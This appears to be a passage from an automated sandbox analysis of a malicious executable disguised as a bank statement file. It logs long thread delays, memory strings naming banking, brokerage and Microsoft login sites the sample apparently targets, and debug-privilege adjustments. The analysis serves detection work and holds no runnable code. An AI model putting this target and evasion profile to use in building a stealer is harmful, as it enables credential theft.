Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597777s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597198s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -594905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -594577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -594355s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1340	Thread sleep count: 2025 > 30
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1340	Thread sleep count: 7829 > 30
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598838s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598515s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598406s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598297s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598181s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -598042s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597936s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597391s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597171s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -597063s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596938s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596813s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596688s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596578s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596469s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596344s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595473s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -594813s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -594594s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe TID: 1584	Thread sleep time: -594375s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597777	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597448	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597198	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596874	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594577	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594355	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598838
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598181
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598042
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597936
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596938
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596813
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596688
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596469
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595473
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594813
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594594
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594375

Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4792513760.0000000000F50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllurat
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4792017072.0000000000EF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Code function: 14_2_068C9548 LdrInitializeThunk,LdrInitializeThunk,

14_2_068C9548

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

